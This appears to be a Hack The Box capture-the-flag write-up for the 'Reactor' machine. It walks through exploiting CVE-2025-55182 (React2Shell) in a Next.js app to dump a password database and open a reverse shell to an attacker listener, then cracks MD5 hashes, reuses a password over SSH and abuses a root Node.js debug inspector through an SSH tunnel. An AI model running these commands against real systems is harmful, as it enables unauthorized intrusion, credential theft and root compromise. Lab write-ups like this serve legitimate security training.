Hack The Box

Reactor

HTBMediumLinuxWebCVERCEPrivEsc

Summary

Reactor is a Medium Linux machine running a Next.js app with React Server Components on port 3000, vulnerable to CVE-2025-55182 (React2Shell) — an unauthenticated RCE via the Flight protocol. The exploit dumps a SQLite database of MD5 password hashes; cracking engineer's hash grants SSH access. A root-owned Node.js process has the debug inspector open on 127.0.0.1:9229, which is reached through an SSH tunnel and abused for code execution as root.

Machine Information

Name	Difficulty	OS	Platform
Reactor	Medium	Linux	Hack The Box

Attack Path

Nmap reveals SSH and a web service on port 3000.
The app is identified as Next.js with React Server Components.
CVE-2025-55182 (React2Shell) gives unauthenticated RCE.
The SQLite database is dumped, exposing MD5 password hashes.
engineer's hash is cracked with John.
SSH access is obtained as engineer.
A root Node.js inspector is found on 127.0.0.1:9229.
An SSH tunnel reaches the debug port.
Node.js Inspector RCE escalates to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.11.224

Nmap Scan

Only SSH (22) and a web service on 3000 were open. Nmap labeled 3000 as ppp?, but the HTTP fingerprint gave it away:

X-Powered-By: Next.js
x-nextjs-cache: HIT
Vary: RSC, Next-Router-State-Tree, ...

The X-Powered-By: Next.js and Vary: RSC headers confirmed a Next.js app using React Server Components.

Web Enumeration

The application presented the "ReactorWatch Core Monitoring System".

Framework: Next.js (App Router)
Rendering: React Server Components (Flight protocol)
Runtime: Node.js
Local DB: SQLite (reactor.db)

This stack matched the conditions for CVE-2025-55182.

Exploitation — React2Shell (CVE-2025-55182)

React2Shell is an insecure deserialization flaw in the React Server Components Flight protocol, enabling unauthenticated RCE from a single crafted HTTP POST. The public PoC was used first in single-command mode to dump the database:

python3 react2shell-poc.py -t http://10.129.11.224:3000 \
  -c "sqlite3 /opt/reactor-app/reactor.db '.dump'"

DB dump via React2Shell

The dump exposed the users table:

INSERT INTO users VALUES(1,'admin','a203b22191d744a4e70ada5c101b17b8','administrator','admin@reactor.htb');
INSERT INTO users VALUES(2,'engineer','39d97110eafe2a9a68639812cd271e8e','operator','engineer@reactor.htb');

The same PoC was used with --revshell to confirm interactive execution:

python3 react2shell-poc.py -t http://10.129.11.224:3000 \
  --revshell --lhost 10.10.15.89 --lport 1337

React2Shell reverse shell

Initial Access

A listener received a shell as the node service user.

nc -nvlp 1337

Reverse shell as node

node@reactor:/opt/reactor-app$

The reactor.db was visible in the app directory, confirming the dump source.

App directory

Privilege Escalation

Cracking credentials

Both MD5 hashes were saved and cracked offline with John:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

John the Ripper

engineer : reactor1

The credential was reused for SSH:

ssh engineer@10.129.11.224

SSH as engineer

Node.js Inspector RCE

As engineer, enumeration revealed a root Node.js process with the debug inspector listening on 127.0.0.1:9229. The inspector lets a connected client evaluate arbitrary JavaScript in the process context — and the process ran as root.

An SSH local port forward exposed the restricted port:

ssh -L 9229:127.0.0.1:9229 engineer@10.129.11.224

SSH local port forward

A Python exploit then connected to the debug WebSocket and executed commands as root:

python3 exploit.py

[+] WebSocket URL: ws://127.0.0.1:9229/997632b8-...
[*] Executando: cat /root/root.txt
    "value": "9645e0e8db5745250b643629f42a5b97\n"

Flags

User

cat /home/engineer/user.txt

1fba9d6031e997f3b9ade249401ccde1

Root

cat /root/root.txt

9645e0e8db5745250b643629f42a5b97

Vulnerabilities Identified

React2Shell — RCE in React Server Components (CVE-2025-55182)

Insecure deserialization in the RSC Flight protocol allowed unauthenticated RCE from a single POST.

Impact: remote code execution as the node service user.

Insecure Credential Storage (unsalted MD5)

reactor.db stored unsalted MD5 password hashes readable by the app user.

Impact: account compromise and lateral movement.

Password Reuse

engineer's database password matched the SSH account password.

Impact: a database dump became authenticated host access.

Exposed Node.js Inspector on a Root Process

A root Node.js process ran with --inspect bound to localhost.

Impact: privilege escalation to root via the debug protocol.

Tools Used

Nmap
react2shell-poc.py (CVE-2025-55182)
Netcat
sqlite3
John the Ripper
SSH (local port forward)
Python 3

Key Takeaways

Fingerprints matter more than the SERVICE column: the HTTP headers revealed the real stack.
Recent CVEs in popular frameworks are target-rich; keeping PoCs handy changes exploitation time.
RCE is often just the start — the real value here was the readable database.
Unsalted MD5 plus password reuse turns a DB dump into a system login.
Debug ports are backdoors: a root Node inspector, even on localhost, is defeated by an SSH tunnel.